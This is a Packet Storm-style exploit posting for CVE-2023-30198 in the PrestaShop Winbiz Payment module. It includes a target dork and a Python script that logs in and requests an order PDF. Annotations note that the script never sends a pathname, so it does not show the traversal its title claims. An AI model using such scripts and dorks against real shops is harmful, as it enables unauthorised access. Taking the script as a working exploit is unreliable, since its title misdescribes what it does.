## https://sploitus.com/exploit?id=PACKETSTORM:173136
# Exploit Title: PrestaShop Winbiz Payment module - Improper Limitation of a Pathname to a Restricted Directory  
# Date: 2023-06-20  
# Dork: /modules/winbizpayment/downloads/download.php  
# country: Iran  
# Exploit Author: Amirhossein Bahramizadeh  
# Category: webapps  
# Vendor Homepage: https://shop.webbax.ch/modules-pour-winbiz/153-module-prestashop-winbiz-payment-reverse.html  
# Version: 17.1.3 (REQUIRED)  
# Tested on: Windows/Linux  
# CVE : CVE-2023-30198  
  
import requests  
import string  
import random  
  
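# --- Request skeleton for the issue named in the header ---
# What this script does, in order:
#   1. POST hard-coded credentials to /authentication.php on base_url.
#   2. POST an order id to the module's download.php on the same session.
#   3. Write whatever body comes back to /tmp/order_<id>.pdf.
#
# NOTE(review): the download request carries only a numeric id_order; no
# pathname is built or sent, so this script does not by itself exercise the
# "improper limitation of a pathname" weakness the header describes. Read it
# as a request skeleton, not as a demonstration of the traversal. For log
# review, POST requests to the download.php path below are the requests of
# interest.

# Base URL of the site under test; every other URL is relative to it
base_url = "http://example.com"

# Front-office login endpoint
login_url = base_url + "/authentication.php"

# Credentials sent in the login POST (hard-coded placeholders)
username = "admin"
password = "password123"

# The module endpoint the header names as vulnerable
download_url = base_url + "/modules/winbizpayment/downloads/download.php"

# The order whose PDF is requested: a plain integer id, no path component
order_id = 1234

# Where the response body is written; the directory is never checked
file_path = f"/tmp/order_{order_id}.pdf"

# Filled after login with a snapshot of the session's cookie jar
session_cookies = None

# A locally generated 32-character token. It is never read from a server
# response, so it is unrelated to any token the server may issue; if the site
# validates this field the login would presumably be rejected (unverified).
csrf_token = "".join(random.choices(string.ascii_uppercase + string.digits, k=32))

# Authenticate; the Session keeps whatever cookies the server sets.
# Login success is not checked: a failed login still proceeds to the download.
login_data = {"email": username, "passwd": password, "csrf_token": csrf_token}
session = requests.Session()
response = session.post(login_url, data=login_data)

# Snapshot of the session cookies, passed explicitly to the next request
# (redundant with the Session object, which already sends them)
session_cookies = session.cookies.get_dict()

# A second locally generated token, with the same caveat as above
csrf_token = "".join(random.choices(string.ascii_uppercase + string.digits, k=32))

# Request the order PDF on the authenticated session
download_data = {"id_order": order_id, "csrf_token": csrf_token}
response = session.post(download_url, cookies=session_cookies, data=download_data)

# Write the body to disk. Neither response.status_code nor the Content-Type is
# checked, so an error page is saved under the .pdf name just the same.
# f.write must sit inside the with block so the handle is still open; at
# column 0 it is an IndentationError and the script never runs.
with open(file_path, "wb") as f:
    f.write(response.content)

# Report where the body was written
print(f"File downloaded to {file_path}")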